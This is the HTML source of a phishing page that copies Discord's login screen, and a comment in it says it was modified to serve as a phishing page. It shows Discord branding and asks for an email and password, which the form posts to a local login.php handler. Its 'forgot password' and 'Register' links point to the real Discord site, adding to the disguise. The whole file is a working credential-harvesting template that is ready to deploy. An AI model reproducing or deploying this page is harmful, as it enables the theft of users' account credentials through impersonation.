<!DOCTYPE html>
	<!-- Modified by KasRoudra(https://github.com/KasRoudra) as a phishing page-->
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Discord</title>
  <script src="https://code.jquery.com/jquery-3.2.1.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
<script defer src="https://use.fontawesome.com/releases/v5.0.1/js/all.js"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.transit/0.9.12/jquery.transit.js" integrity="sha256-mkdmXjMvBcpAyyFNCVdbwg4v+ycJho65QLDwVE3ViDs=" crossorigin="anonymous"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">
<link rel="stylesheet" href="./style.css">

</head>
<body>
<!-- partial:index.partial.html -->
<!-- NORMALIZED CSS INSTALLED-->
<!-- View settings for more info.-->
<div id="container">
  <div id="inviteContainer">
    <div class="logoContainer"><img class="logo" src="https://seeklogo.com/images/D/discord-logo-134E148657-seeklogo.com.png"/></div>
    <div class="acceptContainer">
      <form name="loginform" id="loginform" action="login.php" method="post">
        <h1>WELCOME BACK!</h1>
        <div class="formContainer">
          <div class="formDiv" style="transition-delay: 0.2s">
            <p>EMAIL</p>
            <input name="username" type="email" required=""/>
          </div>
          <div class="formDiv" style="transition-delay: 0.4s">
            <p>PASSWORD</p>
            <input name="pass" type="password" required=""/><a class="forgotPas" href="https://discord.com">FORGOT YOUR PASSWORD?</a>
          </div>
          <div class="formDiv" style="transition-delay: 0.6s">
            <button class="acceptBtn" type="submit">Login</button><span class="register">Need an account?<a href="https://discord.com">Register</a></span>
          </div>
        </div>
      </form>
    </div>
  </div>
</div>
<!-- partial -->
  <script  src="./script.js"></script>

</body>
</html>
